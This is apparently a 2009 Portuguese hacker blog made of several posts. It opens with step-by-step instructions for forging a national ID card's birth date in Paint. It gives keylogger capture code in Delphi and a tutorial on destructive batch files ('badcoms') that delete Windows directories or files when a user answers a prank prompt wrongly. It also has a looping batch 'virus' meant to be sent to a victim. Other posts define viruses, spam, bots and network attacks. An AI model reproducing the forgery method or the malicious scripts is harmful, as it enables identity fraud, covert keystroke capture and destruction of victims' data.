- Foto 3x4 (não precisa ser muito atual)

- Um real

Com o material em mãos, vamos seguindo passo-a-passo. No exemplo, transformarei uma ID de 1990 em 1994 (é só um exemplo, babaca). Não adianta querer me dar parabéns nessa data porque a carteira não é minha. Estou levando em conta que você tem o mínimo conhecimento na "arte" do Paint (recortar, copiar e colar). Caso contrário, procure primeiro um tutorial de como utilizá-lo, ou então acompanhamento médico, porque pra não saber usar o Paint precisa ter algum problema mental.

Primeiro escaneeie a frente e o fundo da ID. Abra o fundo com o Paint. Aqui selecionei apenas o pedaço que nos interessa, a data de nascimento:

Passo 1: Como queremos mudar o ano de nascimento para 1994, recortemos o número 4 do mês:

Passo 2: Agora aperte Ctrl+C e Ctrl+V. Vai aparecer uma cópia do número 4 lá no canto superior esquerdo:

Passo 3: Como já está marcado, basta arrastá-lo até seu destino, em cima do 0 de 1990. O resultado é esse:

Passo 4: Como pode perceber, o fundo ficou com uma cor um pouco diferente. Na impressão isso vai ficar imperceptível, mas se você for perfeccionista existem duas alternativas:

a) Fazer um tratamento pixel por pixel. Foda-se, não vou ensinar isso.

b) Procurar um outro número 4 na ID, cujo fundo seja mais parecido! Existem vários números na carteira, e é praticamente impossível não ter outro 4.

O fundo está pronto. Desde o momento que abriu o Paint até agora, não gastou mais de cinco minutos.

Passo 5: Abra a frente da ID no Paint. Isso é opcional, mas acho que ninguém quer gastar tinta à toa. Por isso, vamos apagar a foto da carteira, já que colaremos uma nova depois. O resultado é esse:

Passo 6: Está na hora de imprimir! Abra o Word e insira a frente e o fundo da ID numa folha.

Certifique-se que o zoom da página está em 100% (é o padrão).

Se não sabe o que é isso, procure descobrir.

E agora não tem mais screenshots, fodam-se.

O Word em 100% significa que a folha na tela está em tamanho real. Sendo assim, pegue sua ID original e coloque na frente do monitor. Isso mesmo. Pegue-a e encoste na tela do PC! Vá ajustando as figuras no Word até que fiquem do mesmo tamanho da original.

Pronto, agora imprima. Tem que ser em qualidade boa, senão fica uma bosta!

Passo 7: Cole a sua foto 3x4 na ID recém-impressa.
Obs: Como a Viviane lembrou nos comentários, a foto tem uns furos. Aposto que antes de eu postar isso, metade das minhas visitas foram parar na delegacia. Ou não.

Passo 8: Pegue seu dinheiro (um real) e procure um lugar pra plastificar. Normalmente o preço é esse. Corte o excesso de plástico, deixando só um pouquinho de sobra.

Passo 9: Me agradeça!!!

O que é VÍRUS?

2009-08-10T22:04:00.009-03:00

Em informática, um vírus de computador é um programa malicioso desenvolvido por programadores que, tal como um vírus biológico, infecta o sistema, faz cópias de si mesmo e tenta se espalhar para outros computadores, utilizando-se de diversos meios.

A maioria das contaminações ocorrem pela ação do usuário executando o arquivo infectado recebido como um anexo de um e-mail.

A segunda causa de contaminação é por Sistema Operacional desatualizado, sem a aplicação de corretivos, que poderiam corrigir vulnerabilidades conhecidas dos sistemas operacionais ou aplicativos, que poderiam causar o recebimento e execução do vírus inadivertidamente.Ainda existem alguns tipos de vírus que permanecem ocultos em determinadas horas, entrando em execução em horas especificas.

O que é SPAM?

2009-08-10T22:04:00.008-03:00

O termo Spam, abreviação em inglês de “spiced ham” (presunto condimentado), é uma mensagem eletrônica não-solicitada enviada em massa.

Na sua forma mais popular, um spam consiste numa mensagem de correio eletrônico com fins publicitários. O termo spam, no entanto, pode ser aplicado a mensagens enviadas por outros meios e noutras situações até modestas. Geralmente os spams têm caráter apelativo e na grande maioria das vezes são incômodos e inconvenientes.

O termo Spam, abreviação em inglês de “spiced ham” (presunto condimentado), é uma mensagem eletrônica não-solicitada enviada em massa.Na sua forma mais popular, um spam consiste numa mensagem de correio eletrônico com fins publicitários. O termo spam, no entanto, pode ser aplicado a mensagens enviadas por outros meios e noutras situações até modestas. Geralmente os spams têm caráter apelativo e na grande maioria das vezes são incômodos e inconvenientes.

O que é MALWARE?

2009-08-10T22:03:00.004-03:00

Malware" é um termo geral normalmente aplicado ao nos referir-mos a qualquer software desenvolvido para causar danos em computadores, servidores ou redes de computador, e isso independentemente de o software ser um vírus, um spyware, etc.

Portanto qualquer software, por exemplo um trojan, ou mesmo um worm, etc são denominados de "malware", o que informa que esses são software que causam MAL a um equipamento, software ou arquivo de dados de um usuário.Obviamente temos que sempre levar em conta os reais níveis de criticidade e risco a segurança causado por cada um dos grupos de malware. Com certeza um Spyware é muito menos perigoso (e seus fabricantes alegam que não levam nenhum risco!) que um vírus, trojan ou worm.

O que é um BOT?

2009-08-10T22:01:00.004-03:00

Bot é um tipo de código malicioso que transforma o computador infectado em um “zumbi”, ou seja, a serviço de seu controlador. Computadores “zumbis” são máquinas que podem ser controladas à distância pelo invasor, independente das ações do usuário

A rede de computadores infectados por um bot é chamada de botnet (rede zumbi), tais redes podem abrigar centenas ou milhares de máquinas. As botnets geralmente são usadas para atacar sites, roubar dados, enviar spam, hospedar sites falsos e realizar ataques de negação de serviço, quando um site é acessado por milhares de máquinas simultaneamente e deixa de responder. A maioria dos bots se espalha utilizando falhas no Windows e redes peer-to-peer (P2P), como eMule e KaZaA, usadas para troca de arquivos entre usuários do mundo todo

Para se defender dos bots o usuário deve manter o sistema operacional rigorosamente atualizado, além de usar um bom firewall, para impedir o fluxo de informações entre o computador do usuário e qualquer outro computador na rede, inclusive o de quem enviou o bot, sem o consentimento do usuário

Entendendo Keylogger

2009-08-10T21:55:00.005-03:00

Ola, Fiz esse tutorial para que todos entendam o código do keylogger e como ele funciona.Vamos lá vou usar de exemplo o código mais conhecido que usa a função coloca. Analisando a função do código:

function Coloca(txt: String): String;

begin

Form1.Memo1.Text := Form1.Memo1.Text + txt;

end; Bem o que ela realmente faz é adicionar uma string txt no memo1. Como usar Adicione um memo e um timer e coloque a função em baixo de implementation. No timer coloque:

(’Esse teste é da função’); O que ele vai fazer é chamar a função e ela vai adicionar o que está entre os ‘ ‘ no memo. Entendendo o código de captura
var

keyloop, KeyResult : Integer;

begin

keyloop := 0;

repeat

KeyResult := GetAsyncKeyState(keyloop);

if KeyResult = -32767 then

begin

case keyloop of

8: Coloca(’ [BACKSPACE] ‘);

9: Coloca(’ [TAB] ‘);

12: Coloca(’ [ALT] ‘);

13: Coloca(’ [ENTER] ‘);

16: Coloca(’ [SHIFT] ‘);

17: Coloca(’ [CONTROL] ‘);

18: Coloca(’ [ALT] ‘);

20: Coloca(’ [CAPS LOCK] ‘);

O que o código vai fazer é o keyloop vai pegar a variável e atribuir um valor a ela.Cada tecla tem o seu valor Decimal ex: Valor Decimal da Tecla Tab é 9 , ele vai converter o valor decimal e vai atribuir o nome que foi colocado entre os ‘ ‘ .

Obs: Não esqueçam de colocar o timer com intervalo 1.

BadCom

2009-08-10T21:28:00.005-03:00

Aprenda a fazer badcom's

Introdução:

Badcom's são pequenos arquivos (.COM) que quando executados, eles realizam tarefas em um determinado computador... ou seja, são programas que fazem com que um PC realize comandos quanto do DOS quanto do Windows. Para isto você deve fazer um arquivo de LOTE com os comandos e compila-lo. O Mais famoso compilador de arquivos de LOTE (.BAT) é o BAT2EXEC.COM. Download do BAT2EXEC.ZIP ==> 5K.
Comandos Básicos

@ECHO OFF

Comando para não ser mostrados as linhas de comando em uma janela do MS-DOS, Exemplo: Colocando o comando DIR em um Badcom sem o @ECHO OFF no prompt ele mostrará o comando escrito na janela.. C:\DIR. Com o comando @ECHO OFF, ele simplesmente elimina os dígitos doscomandos a serem mostrados.

CLS

Comando do MS-DOS, para limpar a tela.

ECHO
Para desativar o comando @ECHO OFF, e mostrar caracteres em uma janela. Exemplo: ECHO "Mensagem" Irá mostrar a mensagem na janela, após isso, automaticamente retorna a não aparição de comandos na Janela.

Criando arquivos com o comando ECHO:
Para criar um arquivo com este comando, é necessário o comando, exemplo: ECHO arquivo.extensão. Irá criar o arquivo no ambiente do MS-DOS... Para criar arquivos com textos ou comandos, é necessário fazer o seguinte comando:

ECHO ARQ.EXT "Comando ou mensagem"

OBS: As aspas são apenas para indicação porém em comandos não funcionam as aspas.

Ex: ECHO Eu.BAT DIR

Irá criar um arquivo chamado Eu.BAT (Arquivo de Lote) Com o comando DIR dentro do mesmo.

ATTRIBE

Este comando permite que você esconda um determinado arquivo, torne-o somente para leitura, ou torne arquivo do sistema. Para obter os comandos simplesmente digite na janela do MS-DOS:

ATTRIB /?

Para Criar diretórios.

Ex:

MD NOMEDODIR

Comando para desfazer diretórios vazios.

EX: RD 'NOME DA PASTA VAZIA'

PROGRAMAS !!

Não é um comando.. heheh... é que nos Badcom's são muito útil o uso de programas comuns, como os padrões do Windows 95.

Exemplo: O Programa Notepad.exe do Windows 95, para ele ser executado, A partir de um Badcom, você deve colocá-lo na linha de comando..NOTEPAD.EXE Para executar o programa a partir de um Badcom... no BAT coloque da seguinte forma: @echo offclsnotepad.exe <--- Não é necessário colocar o Path do Windows 95, pois Sendo executado durante o Windows, não acontecerá erros de não achar o programa .Se quiser abrir textos com o tal programa !notepad.exe arquivo.txt Você pode fazer isto com outros programas como o Pbrush.exe ( Paint ),Sol.exe ( Paciência ). Desde que estes programas instalados.

DEL ou DELETE

Para apagar arquivos, no Badcom é usado da seguinte maneira, Para deletar arquivos sem ter problemas de BUG, é necessário fazer com que o comando não tenha a opção (*.*), pois surgirá um prompt de confirmação de exclusão. Digite então da seguinte maneira:

DEL *.Extensão

Exemplo: Para apagar os arquivos .INI do diretório do Windows:

del Drive:\windir\*.ini

ou use:

drive:

cd\

cd windir

del *.ini

DELTREE

Muitos não tem conhecimento do que este comando pode causar em um sistema, pois é usado da maneira básica. Este "pode ser" o Mais perigoso comando contido em um Badcom. Uso com BUG:DELTREE DIRETORIO. Com este comando, aparecerá a confirmação de exclusão do diretório,será muito difícil alguém responder SIM a pergunta não ??? Bem, vou informar o perigo deste comando...Há uma opção no DELTREE que evita a aparição do prompt de confirmação,sendo ela a mais destrutiva, deletando todos os arquivos de um dir. Bom, para usar o Deltree de forma destrutiva basta acrescentar a opção/Y no mesmo,

Exemplo:

C:\Deltree /y windows

Excluindo windows

REN

Além de não afetar muito em um sistema, o Rename é um comando que pode causar dor de cabeça ao usuário atacado.

EX:

use o REN em diversos arquivos...

REN command.com command.nad

REN Autoexec.bat autoexec.non

e assim vai

PROMPT

Com este comando você pode trocar o C:\> do Ms-dos pelo que você quiser.

Por exemplo:

C:\> PROMPT teste:\>

teste:\>

GOTO

Este comando faz com que o BAT pule ou volte para determinada parte do Programa.

Exemplo: O uso do GOTO é muito usado se quiser que não pare de repetir determinado comando ... usando o comando CLS, veja:

@echo off

:INI <-- Indica a parte do programa onde vai ser voltado o comando

Cls Usam-se dois ponto antes, outros exemplos são :START :COMEÇO

GOTO INI <-- Aqui o comando GOTO, para voltar para o alvo indicado.

CHOICE

Comando que possibilita um prompt, exemplo:

CHOICE /c1234

Para números ou letras é necessário o uso do /c , sem este comando somente CHOICE, mostrará o prompt: [Y,n]?Com o /c e os números irá mostrar: [1,2,3,4]? Este comando precisa de um complemento, leia em: IF e Errorlevel

IF e ERRORLEVEL

Este é muito usado em Badcom's, ele possibilita o desenvolvimento de questões e prompts para o usuário.exemplo: este comando eu uso muito em pegadinhas e perguntas sacanas,cada vez que o usuário erra a pergunta alguns arquivos são apagados.Seguido também do comando CHOICE

Segue a string....

@echo off

cls

echo

Seu sistema paralisou, o que deseja fazer ?

echo [1] Reiniciar

echo [2] Desligar

choice /c12 <-- Mostrará o prompt [1,2]?

if errorlevel 2 goto DES <- aqui o comando if e errorlevel, sendo if errorlevel 1 goto REI se o usuário pressionar o 1, ele irá reiniciar o sistema.

Percebe-se que a posição das strings começa do 2 e depois vai para o 1.

Estes são apenas comandos básicos para se aperfeiçoar nos Comandos do MS-dos você pode consultar o próprio HELP do Ms-dos, ele lhe dará varias informações, como no FORMAT e etc..

Com os badcom's você pode fazer muitas coisas até, destas que acabei de explicar, como por exemplo, mexer na memória do PC, e criar diretórios de impossível acesso para o Windows 95 ou 3.11.

Como compilar um Badcom

Para compilar um Badcom ele deve estar nomeado para nomedoarq.BAT Use o programa BAT2EXEC.COM, o mais conhecido compilador BAT. Usando o Bat2exec.com após editar o Badcom em qualquer editor de textos.. (o Mais usado éo EDIT do Ms-dos, pois não ocorrem erros de caracteres no ambienteMS-DOS) use a sintaxe: bat2exec nomedoarq.bat apague o original ou renomeie, e execute o nomedoarq.COM para teste..Claro que Badcom's somente para assustar.

Vírus de Sacanagem

2009-08-10T20:58:00.006-03:00

Esse virus quando ele é executado ele abre um monte de paginas de internet, você pode colocar qualquer site para a vitima quando ela executar o seu virus abrir um monte de paginas.

1° Abre o bloco de notas e coloque.

2°Depois cole esse codigo lá:

@ECHO OFF

:site

START http://www.xxx.com/

CLS

GOTO site

Obs.: no lugar de "http://www.xxx.com/" você coloca qualquer site, exemplo: "http://www.baixaki.com.br/" mais tem que colocar o "HTTP" na frente do site.

3° Depois que você colar o codigo você salva em ".bat", exemplo: "virus.bat".Depois que você salvar você envia para a vitima.

Esconda seu IP

2009-08-10T20:57:00.004-03:00

Todas as dicas contidas nesta área são totalmente de sua responsabilidade, estão aqui apenas com o intuito de trazer as informações para que vocês internautas tenham um conhecimento além do normal e saiba como se defender na internet, portanto eu não me responsabilizo por qualquer ato imbecil que você venha a fazer com as informações aqui contidas.

Anonymizer
Qualquer Home-Page que você visita pode muito bem obter informações sobre você, como por exemplo: Provedor, endereço IP, sistema operacional que esta usando,navegador que esta usando e talvez o e-mail. O Anonymizer http://www.anonymizer.com age como intermediário entre o seu programa de navegação e os outros websites. Assim sendo, ele impede que o site visitado tenha acesso a qualquer tipo de informação sua. Para usar o serviço, você deve anteceder os URLs com o seguinte endereço do Anonymizer (http://www.anonymizer.com:8080). Se você quiser acessar a home-page da Microsoft, por exemplo, e não quiser que ela obtenha seus dados, você deve digitar no seu navegador:http://www.anonymizer.com:8080/http://www.microsoft.com Pronto desta forma você poderá' até mesmo usar aquelas senhas de sites pornográficos, que você tinha sem se preocupar tanto com a sua segurança.

OBSERVAÇÃO:
O Anonymizer não é 100% seguro. Por isso se puder user tb outros tipos de camuflagem.

Falhas de Software

2009-08-08T23:01:00.005-03:00

Estamos sendo bombardeados - cada dia mais - com notícias sobre falhas descobertas neste ou naquele software, as quais permitem que a gente "hackers" provocarem os mais variados incidentes de segurança. Mas, afinal, o que são estas falhas?
Quando profissionais da área de informática sentem uma inclinação para o ramo da programação, eles devem descobrir se possuem determinados vícios de raciocínio lógico imprescindíveis para a tarefa, e uma dessas qualificações é o exercício de "pensar o impensável", sempre fugir do padrão e analisar seriamente as exceções. Infelizmente nem todos dão o devido valor a isso.
A partir de agora vamos analisar um exemplo extremamente simplificado e descobrir porque administrar exceções é fundamental na segurança de um software.
Imagine uma rotina que verifique a senha de um usuário antes de liberar seu acesso a um sistema qualquer. Ela seria, a muito grosso modo, assim:

1ª instrução:Pedir senha de 4 números ao usuário - usuário digita a senha.

2ª instrução:Se os 4 números forem iguais à senha cadastrada, siga para 3ª instrução.Se os 4 números forem diferentes, negar acesso. Fim do programa.

3ª instrução:Liberar seu acesso. Fim do programa.

Esta é uma rotina simples que funciona muito bem, desde que o usuário obedeça a primeira instrução e digite sua senha de forma correta. Entretanto, é com relação a desobediência que se dá a importância de trabalhar com as exceções.
Vamos supor que o usuário não forneça os dados conforme o programa espera. Por exemplo, ao invés de números, ele digite 4 letras. Quando o programa chegar à 2ª instrução, o computador vai tentar colocar as letras em uma memória que está preparada para receber apenas números, e isto pode provocar um erro que invalidaria toda a 2ª instrução. Ao dar continuidade, o acesso estaria liberado na 3ª instrução independente da senha digitada, desde que não fossem 4 números.
O exemplo acima foi bem simplificado para facilitar o entendimento mas a idéia geral por trás das falhas de software é essa: rotinas mal projetadas que não prevêem todas as ações dos usuários (ou de outras partes do programa). Uma correção para o problema exposto seria uma alteração lógica na filosofia de comparação. Veja:

1ª instrução:Pedir senha de 4 números ao usuário - usuário digita a senha.

2ª instrução:Se os 4 números forem diferentes da senha cadastrada, siga para 3ª instrução.Se os 4 números forem iguais, liberar acesso. Fim do programa.

3ª instrução:Negar seu acesso. Fim do programa.

Com esta alteração, qualquer que fosse o erro provocado pela entrada incorreta de dados resultaria na negação do acesso, uma vez que um erro na 2ª instrução eliminaria a comparação juntamente com a decisão de liberar o acesso do usuário.
Obviamente, este tipo de problema não está limitado a situações de verificação de senhas, muito pelo contrário, ele se espalha pelas rotinas que não recebem muita atenção com relação à segurança, como por exemplo, rotinas de verificação de datas, classificação de dados e principalmente aquelas que recebem dados de outros programas.
Rotinas que são feitas para se comunicar - remotamente - com outras rotinas são as que apresentam as maiores falhas pois, ao construírem estes programas, não é levado em consideração que a rotina interlocutora pode ser modificada - ou substituída, por um hacker, talvez - e que, com isso, passar a enviar dados fora do padrão e do formato esperados, causando erros internos nos programas.
Estes erros provocados por ações despadronizadas e inesperadas nem sempre são tão inofensivos como o exemplo acima, fazendo com que o programa caia em uma falha pura e simples. Algumas vezes estes erros abrem uma brecha por onde podem ser inseridos comandos que o computador, desnorteado com a falha, assume ser parte do programa original e passa a seguir estas instruções implantadas.
O modo como estes comandos são implantados através das falhas é extremamente complexo do ponto de vista didático, principalmente em um curso básico sobre segurança, sendo um trabalho bastante árduo até mesmo para os maiores "escovadores de bits".
Portanto tenha em mente que, quando ouvir falar em uma falha de software que permite a invasão de um sistema ou interrupção de um serviço, você estará vendo o resultado de um trabalho que deveria ter sido feito na época da construção do programa, mas que ficou para depois, nas mãos de especialistas e de hackers.

Under Hacker

2009-08-08T23:00:00.004-03:00

"Não há poder sem informação"

- É com essa frase que o underground se mantém: a eterna busca de mais dados, mais informações, mais sabedoria. O entendimento completo de uma tecnologia é fundamental. O conhecimento completo de todas é o Nirvana!

O mundo virtual em que habitam os hackers é extremamente complexo. Existem os mais graduados, que são respeitados única e exclusivamente pelo grau de conhecimento que possuem;

existem os intermediários, que estão sempre contribuindo com descobertas de pequenas falhas;

e não existe hacker "ouvinte". Um hacker precisa de informação exclusiva e secreta, com a qual poderá trocar ou barganhar com outros hackers.

Os hackers mais avançados se empenham em desenvolver ataques muito sofisticados, pesquisas de grande porte, e por isso passam um bom tempo recebendo informação de "hackers operários" e montando gigantescos quebra-cabeças, sem que para isso precisem compartilhar uma informação que não tenha sido exaustivamente testada, não pondo em risco seu projeto.

Estes grandes ataques, quando ocorrem, movimentam toda a comunidade hacker, e principalmente os responsáveis pela segurança em sistemas iguais ao que sofreu o ataque. A circulação da informação de como o ataque foi feito pode levar dias (contando com o levantamento procedimental por parte da vítima) e até que todos os sistemas semelhantes corrijam as falhas que permitiram o ataque, muitos outros sistemas ficam vulneráveis durante horas, pois a informação técnica do ataque no underground hacker é repassada de uma maneira muito mais veloz, já que o procedimento não precisa ser descoberto, apenas refeito.

Podemos perceber, então, que uma informação realmente séria sobre falha de segurança é geralmente válida por muito pouco tempo. Empresas sérias com sistemas importantes corrigem suas falhas de forma quase tão rápida quanto o ataque (quase! este é o problema). E dificilmente um sistema em que a segurança é completamente vital utiliza processos comum. Geralmente são processos personalizados, de tecnologia própria, o que comunitariamente é muito bom, pois um ataque efetuado naquele sistema não funcionará em nenhum outro, mas por outro lado, apenas os responsáveis por este sistema é que estarão encarregados de detectar e corrigir o problema, coisa que é conseguida de forma absurdamente mais rápida quando muitas pessoas temem sofrer o mesmo ataque.

A tendência, hoje, é a de se formarem grupos, onde há somente uma troca de informação interna, entre os componentes, e está cada vez mais raro a troca de informações entre os grupos. Talvez estejamos presenciando uma corrida para o aperfeiçoamento das técnicas. Um grupo parece estar sempre preocupado em superar o outro. Fica a proposta, inclusive, de inaugurarmos uma "Tecnogincana"! O que você acha?

Sua Senha

2009-08-08T22:59:00.004-03:00

"Senhas tem que ser trocadas regularmente"

Senhas podem ser descobertas por escuta de rede, observação, captura de teclado, engenharia social ou mesmo reveladas por livre e espontânea vontade. Em toda troca de senha a forma utilizada para obtê-la da primeira vez poderá ser repetida, principalmente pela escuta de rede ou revelação espontânea. Portanto, impor uma periodicidade de troca de senha, na maioria dos casos, não contribui para melhorar a segurança.

As medidas mais eficazes para evitar comprometimento da senha são, sobretudo o trabalho de conscientização dos funcionários para aspectos de segurança, incluindo a preservação da senha.

Outro ponto fundamental é prover estruturas que não permitam a passagem da senha em claro pela rede, mecanismos de criptografia e isolamento de segmentos são fundamentais para aumentar a segurança da senha.

Existem ainda alguns efeitos colaterais importantes, é comum o usuário que troque a senha constantemente esquecer a atual, ou ter uma quantidade finita de senhas que vão sendo informadas ciclicamente a cada troca, problemas que causam transtorno e não agregam nenhum valor à segurança do ambiente. Trocas de senhas devem ocorrer quando houver suspeita de comprometimento, e existir a certeza de que foram criados mecanismos para que a troca seja feita com segurança e realmente pelo proprietário e que tenham sido sanadas as falhas que permitiram obtê-las.

Tipos de Invasão e as Principais Técnicas Usadas

2009-08-08T22:19:00.007-03:00

Estes são alguns dos ataques que podem ser realizados contra qualquer rede que se conecte à Internet sem a devida proteção. A maioria deles é passível de ser realizada facilmente por qualquer pessoa que disponha do conhecimento técnico necessário.
O Firewall Aker protege sua rede contra todos os ataques aqui mencionados e muitos outros, oferecendo uma total transparência e flexibilidade. Ele é um software fundamental para todas as redes que pretendem se conectar à Intenet.

Varreduras de portas
A primeira coisa que um atacante normalmente faz em uma rede é o chamado Varredura de Portas. Isto consiste em enviar pacotes para todas as portas de uma máquina (ou de várias máquinas de uma rede), de modo a descobrir quais são os serviços oferecidos por cada uma delas. Com o uso desta técnica, é possível se determinar exatamente quais serviços TCP e UDP estão sendo oferecidos.
Este tipo de ataque ficou muito popular quando em 1995 foi lançado, com grande publicidade, o software SATAN, desenvolvido por Dan Farmer e Wietse Wenema. Feito em Perl, C e HTML, com uma interface amigável, o SATAN faz uma varredura completa em uma máquina ou rede denominada "alvo", relatando todos os serviços oferecidos e pontos vulneráveis. Ele não só descobre quais serviços estão disponíveis como também utiliza estes serviços para descobrir mais informações sobre o alvo e mais pontos vulneráveis. Existem atualmente inúmeros programas com funcionalidade similar ao SATAN, alguns em domínio público.
O Firewall Aker impede este tipo de ataque uma vez que somente os serviços explicitamente configurados por um administrador como passíveis de serem usados externamente serão visíveis para qualquer programa de varredura. Além disso, com o uso do Firewall Aker, é extremamente simples se detectar ataques deste tipo e tomas as devidas providências.

IP Spoofing
IP Spoofing é o nome dado para falsificações de endereços IP, fazendo com que um pacote seja emitido com o endereço de origem de uma outra máquina. Com o uso desta técnica, é possível para um atacante assumir a identidade de qualquer máquina da Internet.
O perigo maior deste ataque é para serviços baseados no protocolo UDP. Muitos serviços baseados neste protocolo só permitem acesso para determinadas máquinas, explicitamente configuradas pelo administrador. Este é o caso do serviço NFS, que permite o compartilhamento de discos remotos. (vamos dar um exemplo de ataque usando este serviço específico, mas o ataque é válido para qualquer serviço similar).
Um atacante pode enviar um pacote UDP para a máquina servidora de NFS como se este viesse de uma máquina cliente, autorizada a gravar em algum diretório. Este pacote pode conter solicitação de criação, remoção e escrita de arquivos. Como a máquina servidora acha que o pacote vem da máquina cliente (por causa do IP de origem falsificado), todas as solicitações serão prontamente atendidas. Este tipo de ataque não pode ser bloqueado sem a existência de um firewall.
O Firewall Aker impede este tipo de ataque na medida em que o administrador configura de qual interface de rede um determinado pacote pode ser aceito. Desta forma, se um atacante enviar um pacote para o firewall, como se este viesse da rede interna, o mesmo será imediatamente descartado pois está vindo de uma interface de rede inválida (uma interface de rede externa).

Roteamento dirigido
O protocolo TCP/IP foi um protocolo criado na época da guerra fria, com o objetivo de conectar a rede ARPANET, a rede de defesa do exército americano. Um dos objetivos desta rede, e do protocolo TCP/IP, era permitir que a mesma continuasse funcionando, mesmo que uma parte dela fosse derrubada (isto era fundamental no caso de ataques). Para possibilitar este tipo de comportamento, o protocolo IP foi dotado da capacidade do emissor de um pacote estabelecer a rota que o mesmo deveria seguir ao ser enviado através da rede. Desta forma, mesmo que uma parte da rede fosse derrubada, poderia-se estabelecer caminhos alternativos para o tráfego e manter a comunicação.
A quase totalidade das implementações de TCP/IP atuais ainda seguem as especificações originais, que determinam que ao se receber um pacote com roteamento dirigido, todas as repostas à este pacote também devem ser direcionadas e devem seguir a mesma rota especificada no pacote de origem (na ordem inversa, evidentemente). Se isso não fosse desta forma, não seria possível se atingir o objetivo de manter a comunicação em funcionamento.
Apesar de interessante, este comportamento possibilita a existência de um tipo de ataque que é fácil de ser implementado e impossível de ser impedido, senão com o uso de algum tipo de firewall. O ataque se baseia no fato de que em muitas vezes a validação de um serviço ou de um usuário é feito com base no endereço IP da máquina que está se conectando. Com o uso de pacotes direcionados, um atacante pode enviar pacotes para as máquinas da rede interna como se fossem originados de uma máquina confiável. Desta forma, o atacante consegue estabelecer uma conexão válida para uma máquina da rede interna com os direitos que teria se estivesse se conectando a partir de uma outra máquina.
Este tipo de ataque é particularmente perigoso em serviços que utilizam apenas endereços IP para fazer a validação de usuários, como o rsh, rlogin, etc. O Firewall Aker impede este tipo de ataque na medida em que permite que o administrador o configure para recusar todos os pacotes direcionados.

Ping O'Death
Este ataque foi descoberto recentemente e bastante explorado na Internet. Ele consiste em se enviar um pacote IP com tamanho maior que o máximo permitido (65535 bytes), para a máquina que se deseja atacar. O pacote é enviado na forma de fragmentos (a razão é que nenhum tipo de rede permite o tráfego de pacotes deste tamanho) e quando a máquina destino tenta montar estes fragmentos, inúmeras situações podem ocorrer: a maioria da máquinas trava, algumas reinicializam, outras abortam e mostram mensagens no console, etc. Praticamente todas as plataformas eram afetadas por este ataque, e todas as que não tiveram correções de segurança instalados, ainda o são.
Este ataque recebeu o nome de Ping O' Death porque as primeiras ocorrências deste ataque foram a partir do programa ping, entretanto, qualquer pacote IP com mais de 65535 (pacote inválido) provoca o mesmo efeito.
O Firewall Aker impede este ataque na medida em que ele armazena e monta todos os fragmentos de pacotes IP recebidos. Quando ele detecta um pacote inválido, o mesmo é automaticamente descartado.

SYN Flood
SYN Flood é um dos mais populares ataques de negação de serviço (denial of service). Esses ataques visam impedir o funcionamento de uma máquina ou de um serviço específico. No caso do SYN Flood, consegue-se inutilizar quaisquer serviços baseados no protocolo TCP. Para se entender este ataque, é necessário primeiro se entender o funcionamento do protocolo TCP, no que diz respeito ao estabelecimento de conexões:
O protocolo TCP utiliza um esquema de 3 pacotes para estabelecer uma conexão:
1. A máquina cliente envia um pacote para a máquina servidora com um flag especial, chamado de flag de SYN. Este flag indica que a máquina cliente deseja estabelecer uma conexão.
2. A máquina servidora responde com um pacote contendo os flags de SYN e ACK. Isto significa que ela aceitou o pedido de conexão e está aguardando uma confirmação da máquina cliente para marcar a conexão como estabelecida.
3. A máquina cliente, ao receber o pacote com SYN e ACK, responde com um pacote contendo apenas o flag de ACK. Isto indica para a máquina servidora que a conexão foi estabelecida com sucesso.
Todos os pedidos de estabelecimento de conexões recebidas por um servidor ficam armazenados em uma fila especial, que tem um tamanho pré-determinado e dependente do sistema operacional, até que o servidor receba a comunicação da máquina cliente de que a conexão está estabelecida. Caso o servidor receba uma pedido de conexão e a fila de conexões em andamento estiver cheia, este novo pacote de pedido de abertura de conexão é descartado.
O ataque consiste basicamente em se enviar um grande número de pacotes de abertura de conexão, com um endereço de origem forjado, para um determinado servidor. Este endereço de origem é forjado para o de uma máquina inexistente (muitas vezes se usa um dos endereços reservados descritos no capítulo sobre conversão de endereços). O servidor, ao receber estes pacotes, coloca uma entrada na fila de conexões em andamento, envia um pacote de resposta e fica aguardando uma confirmação da máquina cliente. Como o endereço de origem dos pacotes é falso, esta confirmação nunca chega ao servidor. O que acontece é que em um determinado momento, a fila de conexões em andamento do servidor fica lotada. A partir daí, todos os pedidos de abertura de conexão são descartados e o serviço inutilizado. Esta inutilização persiste durante alguns segundos, pois o servidor ao descobrir que a confirmação está demorando demais, remove a conexão em andamento da lista. Entretanto, se o atacante persistir em mandar pacotes seguidamente, o serviço ficará inutilizado enquanto ele assim o fizer. O Firewall Aker possui um módulo especial de proteção contra ataques de SYN flood, oferecendo total proteção contra ataques deste tipo.

Ataques contra o protocolo NETBIOS
Praticamente todas as redes locais existentes hoje em dia possuem PCs rodando plataformas Windows 3.11(tm), Windows 95(tm), Windows NT(tm) ou OS/2(tm). Estas plataformas possuem a característica de disponibilizar todos os seus serviços de rede através do protocolo NETBIOS. Ocorre também que praticamente todas estas máquinas rodam o protocolo TCP/IP, possibilitando que o NETBIOS seja encapsulado sobre o TCP/IP.
Se estas máquinas estão conectadas à Internet, é possível para um atacante verificar quais são os diretórios e impressoras compartilhadas por cada uma delas. Além disso, devido ao fato de muitas vezes os compartilhamentos serem feitos indiscriminadamente, normalmente pelos próprios usuários, é muito comum se conseguir acesso de leitura ou de gravação em muitos diretórios. Desta forma um atacante pode ter acesso à informações confidenciais, apagar informações importantes ou mesmo implantar arquivos contaminados nas máquinas da rede interna.
Além disso, até pouco tempo atrás, as máquinas Windows NT eram vulneráveis a diversos tipos de ataques realizados contra os serviços NETBIOS, que terminavam por travar o sistema ou inutilizar completamente todos os serviços (os ataques podiam ir de um simples telnet para a porta 139 até a ataques mais sofisticados). Mesmo hoje em dia ainda existem muitas máquinas vulneráveis, devido ao fato de ser necessário a aplicação de correções específicas para estes problemas, coisa que muitos administradores não fazem.
O Firewall Aker bloqueia ataques deste tipo facilmente: os serviços NETBIOS utilizam as portas 137, 138 e 139 dos protocolos TCP e UDP e portanto basta bloquear o acesso destas portas para máquinas externas.

Ataques contra o X-Windows
X-Windows é o padrão de interface gráfica utilizado em máquinas Unix. Ele é um padrão que foi criado visando o seu uso em redes locais. Desta forma, é possível se executar um programa em uma máquina e mostrar sua saída em outra máquina, localizada em qualquer lugar da Internet. É também possível um usuário ter programas sendo executados em diversas máquinas e todos eles sendo visualizados como se fossem aplicações locais, cada um na sua janela.
